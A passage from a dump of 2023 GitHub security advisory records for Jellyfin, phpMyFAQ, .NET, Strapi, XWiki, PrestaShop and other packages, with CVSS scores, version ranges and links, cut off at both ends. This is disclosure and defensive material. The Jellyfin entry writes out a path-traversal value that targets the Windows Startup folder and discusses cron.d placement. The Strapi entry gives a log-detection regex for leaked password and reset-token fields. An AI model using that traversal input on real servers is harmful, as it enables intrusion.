I've been reading the codebase here and there for a couple of days and found a directory traversal inside the ClientLogController, specifically /ClientLog/Document.
The GetRequestInformation method retrieves the name and version of the client from the HttpContext.User object.
Those values are attacker controlled when authenticating against the API. Both values are interpolated into a string, which ultimately ends up as an argument to Path.Combine().
Setting a client name to the relative path "\..\..\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test" will write a file with completely attacker controlled content to the executing user's autostart directory.
However, because the attacker only partially controls the filename, exploitation proves to be tricky. That's because the resulting file will always end in ".log", which means putting something in the autostart directory is only going to open notepad on startup. I mean, we can at least insult the user :^).
Anyway, the next logical step would be to write into Jellyfin's plugins directory, but the sub-directories there (of which the already existing configurations directory conveniently counts as one!) are only getting scanned for ".dll" files.
This stops an attacker from providing malicious DLLs that implement the correct interfaces in order to be recognized as legitimate plugins.
On Linux, there might be more options. Running as the standard root user inside a container, an attacker could of course write anywhere. There's the very interesting "/etc/cron.d" directory, where an attacker can place cron jobs that get picked up automatically. Those files, however, can't contain a dot. Moreover, inside the container the cronjobs are probably not being executed, as the Jellyfin process should be only one running.
For the stored XSS component, see https://github.com/jellyfin/jellyfin-web/security/advisories/GHSA-89hp-h43h-r5pq
### Patches
10.8.10
### Workarounds
N/A
### References
A complete write-up is available here: https://gebir.ge/blog/peanut-butter-jellyfin-time/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Jellyfin.Controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.8.0'}, {'fixed': '10.8.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/jellyfin/jellyfin-web/security/advisories/GHSA-89hp-h43h-r5pq'}, {'type': 'WEB', 'url': 'https://github.com/jellyfin/jellyfin/security/advisories/GHSA-9p5f-5x8v-x65m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30626'}, {'type': 'WEB', 'url': 'https://github.com/jellyfin/jellyfin/pull/5918'}, {'type': 'WEB', 'url': 'https://github.com/jellyfin/jellyfin/commit/82ad2633fdfb1c37a158057c7935f83e1129eda7'}, {'type': 'PACKAGE', 'url': 'https://github.com/jellyfin/jellyfin'}, {'type': 'WEB', 'url': 'https://github.com/jellyfin/jellyfin/blob/22d880662283980dec994cd7d35fe269613bfce3/Jellyfin.Api/Controllers/ClientLogController.cs#L44'}, {'type': 'WEB', 'url': 'https://github.com/jellyfin/jellyfin/releases/tag/v10.8.10'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T22:39:03Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8595-6653-96p2
|
2023-05-10T00:42:09Z
|
2023-04-30T03:30:25Z
| null |
['CVE-2023-2428']
|
phpMyFAQ vulnerable to Stored Cross-site Scripting
|
phpMyFAQ prior to version 3.1.13 has a stored cross site scripting vulnerability in `name` field in add question module. This allows an attacker to steal user cookies.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.13'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2428'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/0a4980d870bac92df945f6d022726c4e3ed584ab'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cee65b6d-b003-4e6a-9d14-89aa94bee43e'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T22:30:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w4m3-43gp-x8hx
|
2023-04-19T17:08:54Z
|
2023-04-11T22:02:15Z
| null |
['CVE-2023-28260']
|
.NET Remote Code Execution vulnerability
|
# Microsoft Security Advisory CVE-2023-28260: .NET Remote Code Execution Vulnerability
## <a name="executive-summary"></a>Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A vulnerability exists in .NET running on Windows where a runtime DLL can be loaded from an unexpected location, resulting in remote code execution.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/250
### <a name="mitigation-factors"></a>Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
## <a name="affected-software"></a>Affected software
* Any .NET 7.0 application running on .NET 7.0.4 or earlier.
* Any .NET 6.0 application running on .NET 6.0.15 or earlier.
## Advisory FAQ
### <a name="how-affected"></a>How do I know if I am affected?
If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.
### <a name="how-fix"></a>How do I fix the issue?
* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;
* If you are using one of the affected packages, please update to the patched version listed above.
```
.NET Core SDK (reflecting any global.json):
Version: 6.0.300
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 6.0.5
Commit: 8473146e7d
.NET Core SDKs installed:
6.0.300 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
```
* If you're using .NET 7.0, you should download and install Runtime 7.0.5 or SDK 7.0.203 (for Visual Studio 2022 v17.5) from https://dotnet.microsoft.com/download/dotnet-core/7.0.
* If you're using .NET 6.0, you should download and install Runtime 6.0.16 or SDK 6.0.311 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.
.NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.
Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.
Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) including [Native AOT](https://learn.microsoft.com/dotnet/core/deploying/native-aot/) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
## Other Information
### Reporting Security Issues
If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to [email protected]. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>.
### Support
You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.
### Disclaimer
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
### Acknowledgements
[ycdxsb](https://github.com/ycdxsb) with [VARAS@IIE](http://www.iie.ac.cn/)
### External Links
[CVE-2023-28260]( https://www.cve.org/CVERecord?id=CVE-2023-28260)
### Revisions
V1.0 (April 11, 2023): Advisory published.
_Version 1.0_
_Last Updated 2023-04-11_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.4'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.15'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.4'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.15'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.4'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.15'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.15'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.4'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-w4m3-43gp-x8hx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28260'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28260'}, {'type': 'WEB', 'url': 'https://www.cve.org/CVERecord?id=CVE-2023-28260'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-11T22:02:15Z', 'nvd_published_at': '2023-04-11T21:15:00Z'}
|
1.4.0
|
GHSA-35jj-vqcf-f2jf
|
2023-04-26T19:45:04Z
|
2023-04-26T19:45:04Z
| null |
['CVE-2023-30843']
|
Hidden fields can be leaked on readable collections in Payload
|
### Details
If a user has access to documents that contain hidden fields or fields they do not have access to, the user could reverse-engineer those values via brute force.
Affected versions: < 1.7.0
### Workarounds
If you are unable to update, you can write a `beforeOperation` hook to remove `where` queries that attempt to access hidden field data.
### Detecting Compromise
Monitor your instance for brute-force style requests against your instance using `where` queries.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'payload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/payloadcms/payload/security/advisories/GHSA-35jj-vqcf-f2jf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30843'}, {'type': 'PACKAGE', 'url': 'https://github.com/payloadcms/payload'}, {'type': 'WEB', 'url': 'https://github.com/payloadcms/payload/releases/tag/v1.7.0'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-26T19:45:04Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2r9r-8fcg-m38g
|
2023-04-07T19:22:33Z
|
2023-04-07T19:22:33Z
| null |
['CVE-2023-29016']
|
Goobi viewer Core has Cross-Site Scripting Vulnerability in User Nicknames
|
### Impact
A cross-site scripting vulnerability has been identified in Goobi viewer core when using nicknames. An attacker could create a user account and enter malicious scripts into their profile's nickname, resulting in the execution in the user's browser when displaying the nickname on certain pages.
### Patches
The vulnerability has been fixed in version 23.03
If you have any questions or comments about this advisory:
* Email us at [[email protected]](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.goobi.viewer:viewer-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.03'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/intranda/goobi-viewer-core/security/advisories/GHSA-2r9r-8fcg-m38g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29016'}, {'type': 'WEB', 'url': 'https://github.com/intranda/goobi-viewer-core/commit/8eadb32b3fdcb775678b74d95bc3df018a5d5238'}, {'type': 'PACKAGE', 'url': 'https://github.com/intranda/goobi-viewer-core'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T19:22:33Z', 'nvd_published_at': '2023-04-06T20:15:00Z'}
|
1.4.0
|
GHSA-wv7j-rc2q-9j67
|
2023-05-04T21:38:55Z
|
2023-04-25T18:30:23Z
| null |
['CVE-2023-30177']
|
Cross Site Scripting in CraftCMS
|
CraftCMS prior to version 3.7.68 is vulnerable Cross Site Scripting (XSS). An attacker can inject javascript code into Volume Name.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.68'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30177'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/00fb253d5318e10204433e5d93934108e574005e'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-26T16:00:04Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jg8w-wgx2-g7q4
|
2023-04-24T22:41:31Z
|
2023-04-15T15:30:15Z
| null |
['CVE-2022-2525']
|
Improper Restriction of Excessive Authentication Attempts in calibreweb
|
Improper Restriction of Excessive Authentication Attempts in GitHub repository janeczku/calibre-web prior to 0.6.20.
|
[]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'calibreweb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2525'}, {'type': 'WEB', 'url': 'https://github.com/janeczku/calibre-web/commit/49e4f540c9b204c7e39b3c27ceadecd83ed60e7e'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/9ff87820-c14c-4454-9764-406496254ef0'}]
|
{'cwe_ids': ['CWE-307'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T22:41:31Z', 'nvd_published_at': '2023-04-15T13:15:00Z'}
|
1.4.0
|
GHSA-wh3w-jcc7-mhmf
|
2023-05-04T20:05:08Z
|
2023-04-20T21:33:27Z
| null |
['CVE-2023-28459']
|
pretalx vulnerable to path traversal in HTML export
|
pretalx before 2.3.2 allows path traversal in HTML export (a non-default feature). Users were able to upload crafted HTML documents that trigger the reading of arbitrary files.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'pretalx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28459'}, {'type': 'WEB', 'url': 'https://github.com/pretalx/pretalx/commit/60722c43cf975f319e94102e6bff320723776890'}, {'type': 'PACKAGE', 'url': 'https://github.com/pretalx/pretalx'}, {'type': 'WEB', 'url': 'https://github.com/pretalx/pretalx/releases/tag/v2.3.2'}, {'type': 'WEB', 'url': 'https://pretalx.com/p/news/security-release-232/'}, {'type': 'WEB', 'url': 'https://www.sonarsource.com/blog/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference/'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T20:16:25Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jjqf-j4w7-92w8
|
2023-04-19T21:41:26Z
|
2023-04-19T21:41:26Z
| null |
['CVE-2023-22894']
|
Strapi leaking sensitive user information by filtering on private fields
|
### Summary
Strapi through 4.7.1 allows unauthenticated attackers to discover sensitive user details for Strapi administrators and API users.
### Details
Strapi through 4.7.1 allows unauthenticated attackers to discover sensitive user details for Strapi administrators and API users. The unauthenticated attacker can filter users by columns that contain sensitive information and infer the values by the changes in the API responses. An unauthenticated attacker can exploit this vulnerability to hijack Strapi administrator accounts and gain unauthorized Strapi Super Administrator access by leaking the password reset token and changing the admin password. This can be exploited on all Strapi versions <=4.7.1.
### IoC
The exploitation of CVE-2023-22894 is easily detectable, since the payload is within the GET parameters and are normally included in request logs. The following regex pattern will extract requests that are exploiting this vulnerability to leak user's email, password and password reset token columns.
`/(\[|%5B)\s*(email|password|reset_password_token|resetPasswordToken)\s*(\]|%5D)/`
You can search log files for this IoC by using the following grep command.
`grep -iE '(\[|%5B)\s*(email|password|reset_password_token|resetPasswordToken)\s*(\]|%5D)' $PATH_TO_LOG_FILE`
If the above regex pattern matches any lines in your log files, take extra precaution to look out for multiple requests that include password, reset_password_token or resetPasswordToken. This would indicate that an attacker has leaked the password hashes and reset tokens on your Strapi server and you need to immediately start an incident response!
### Impact
All Strapi users below 4.8.0
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@strapi/strapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.1'}, {'fixed': '4.8.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/strapi/strapi/security/advisories/GHSA-jjqf-j4w7-92w8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22894'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v4.8.0'}, {'type': 'WEB', 'url': 'https://strapi.io/blog/security-disclosure-of-vulnerabilities-cve'}, {'type': 'WEB', 'url': 'https://www.ghostccamm.com/blog/multi_strapi_vulns/'}]
|
{'cwe_ids': ['CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-19T21:41:26Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-cmvg-w72j-7phx
|
2023-04-26T22:16:39Z
|
2023-04-12T20:38:47Z
| null |
['CVE-2023-29206']
|
org.xwiki.platform:xwiki-platform-skin-skinx vulnerable to basic Cross-site Scripting by exploiting JSX or SSX plugins
|
### Impact
There was no check in the author of a JavaScript xobject or StyleSheet xobject added in a XWiki document, so until now it was possible for a user having only Edit Right to create such object and to craft a script allowing to perform some operations when executing by a user with appropriate rights.
### Patches
This has been patched in XWiki 14.9-rc-1 by only executing the script if the author of it has Script right.
### Workarounds
The only known workaround consists in applying [the following patch](https://github.com/xwiki/xwiki-platform/commit/fe65bc35d5672dd2505b7ac4ec42aec57d500fbb) and rebuilding and redeploying `xwiki-platform-skin-skinx`.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira](http://jira.xwiki.org)
* Email us at [Security ML](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-skin-skinx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0-milestone-1'}, {'fixed': '14.9-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cmvg-w72j-7phx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29206'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/fe65bc35d5672dd2505b7ac4ec42aec57d500fbb'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19514'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19583'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-9119'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:38:47Z', 'nvd_published_at': '2023-04-15T16:15:00Z'}
|
1.4.0
|
GHSA-65g2-x53q-cmf6
|
2023-04-24T22:44:38Z
|
2023-04-24T22:44:38Z
| null |
['CVE-2023-30618']
|
Sensitive Terraform Output Values Printed At Info Logging Level In Kitchen-Terraform
|
### Summary
Kitchen-Terraform v7.0.0 introduced a regression which caused all Terraform output values, including sensitive values, to be printed at the `info` logging level during the `kitchen converge` action. Prior to v7.0.0, the output values were printed at the `debug` level to avoid writing sensitive values to the terminal by default.
### Original Report
@brettcurtis:
> Hopefully, I'm not doing something stupid here, but I'm seeing sensitive outputs printed in the kitchen output. You can check this action for an example: https://github.com/osinfra-io/terraform-google-project/actions/runs/4700065515/jobs/8334277309#step:5:215
>
> It's not really a sensitive value just used it as an example.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'kitchen-terraform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/newcontext-oss/kitchen-terraform/security/advisories/GHSA-65g2-x53q-cmf6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30618'}, {'type': 'WEB', 'url': 'https://github.com/newcontext-oss/kitchen-terraform/commit/3d20d60e7a891e2dd747df995a31226fa0b4ac48'}, {'type': 'PACKAGE', 'url': 'https://github.com/newcontext-oss/kitchen-terraform'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/kitchen-terraform/CVE-2023-30618.yml'}]
|
{'cwe_ids': ['CWE-532'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T22:44:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4cr4-x82x-hwm9
|
2023-04-06T16:55:11Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1886']
|
thorsten/phpmyfaq vulnerable to authentication bypass
|
thorsten/phpmyfaq prior to 3.1.12 is vulnerable to authentication bypass by capture-relay that allows unlimited comments to be sent. This has been fixed in 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1886'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/27eaaae16850694634ac52416a0bd38b35d7330a'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b7d244b7-5ac3-4964-81ee-8dbb5bb5e33a'}]
|
{'cwe_ids': ['CWE-294'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-06T16:55:11Z', 'nvd_published_at': '2023-04-05T17:15:00Z'}
|
1.4.0
|
GHSA-jh3w-6jp2-vqqm
|
2023-04-26T19:47:07Z
|
2023-04-26T19:47:07Z
| null |
['CVE-2023-22728']
|
Missing permission check of canView in GridFieldPrintButton
|
The GridField print view incorrectly validates the permission of DataObjects potentially allowing a content author to view records they are not authorised to access.
Upgrade to `silverstripe/framework` 4.12.5 or above to address the issue.
Reported by Stephan Bauer from [relaxt Webdienstleistungsagentur GmbH](https://www.relaxt.at/)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/security/advisories/GHSA-jh3w-6jp2-vqqm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22728'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/commit/fd5d8217e83768d7bf841e94b2d4d82642d5bc58'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2023-22728.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-framework'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/cve-2023-22728'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-26T19:47:07Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xxm6-ff3x-v4vm
|
2023-04-06T15:08:30Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1885']
|
thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via category field name parameter
|
thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the `category field name` parameter. This has been fixed in 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1885'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/fecc803ab9c3e82718c4bcea7fe919d7a22ec024'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/bce84c02-abb2-474f-a67b-1468c9dcabb8'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-06T15:08:30Z', 'nvd_published_at': '2023-04-05T17:15:00Z'}
|
1.4.0
|
GHSA-p379-cxqh-q822
|
2023-04-25T19:45:58Z
|
2023-04-25T19:45:58Z
| null |
['CVE-2023-30839']
|
SQL filter bypass leading to arbitrary write requests using "SQL Manager"
|
### Impact
SQL filtering vulnerability, a BO user can write, update and delete in the database, even without having specific rights.
### Patches
PrestaShop 8.0.4 and 1.7.8.9 will contain the patch.
### Workarounds
no
### References
no
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.8.9'}]}]}]
|
